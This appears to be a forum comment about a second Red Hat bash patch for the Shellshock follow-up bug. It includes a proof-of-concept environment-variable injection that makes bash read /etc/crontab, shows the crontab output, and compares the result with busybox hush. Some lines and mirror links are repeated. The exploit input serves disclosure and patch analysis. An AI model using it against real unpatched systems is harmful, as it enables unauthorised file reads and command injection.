http://mirror.centos.org/centos/6/updates/x86_64/Packages/ba...
What I find slightly strange is a second patch is not yet available on gnu/bash itself, so this must have been developed in-house by redhat or published elsewhere first.
I guess we could diff the second version with the first.
$ bash --version GNU bash, version 3.2.25(1)-release (i686-redhat-linux-gnu) Copyright (C) 2005 Free Software Foundation, Inc. $ env -i X='() { (a)=<\' bash -c '/etc/crontab cat' bash: X: line 1: syntax error near unexpected token `=' bash: X: line 1: `' bash: error importing function definition for `X' SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root HOME=/ # run-parts 01 * * * * root run-parts /etc/cron.hourly 02 4 * * * root run-parts /etc/cron.daily 22 4 * * 0 root run-parts /etc/cron.weekly 42 4 1 * * root run-parts /etc/cron.monthly
busybox$ env -i X='() { (a)=<\' ./busybox hush -c '/etc/crontab cat' hush: can't execute '/etc/crontab': Permission denied
http://mirror.centos.org/centos/6/updates/x86_64/Packages/ba...
http://mirror.centos.org/centos/6/updates/x86_64/Packages/ba...
What I find slightly strange is a second patch is not yet available on gnu/bash itself, so this must have been developed in-house by redhat or published elsewhere first.
I guess we could diff the second version with the first.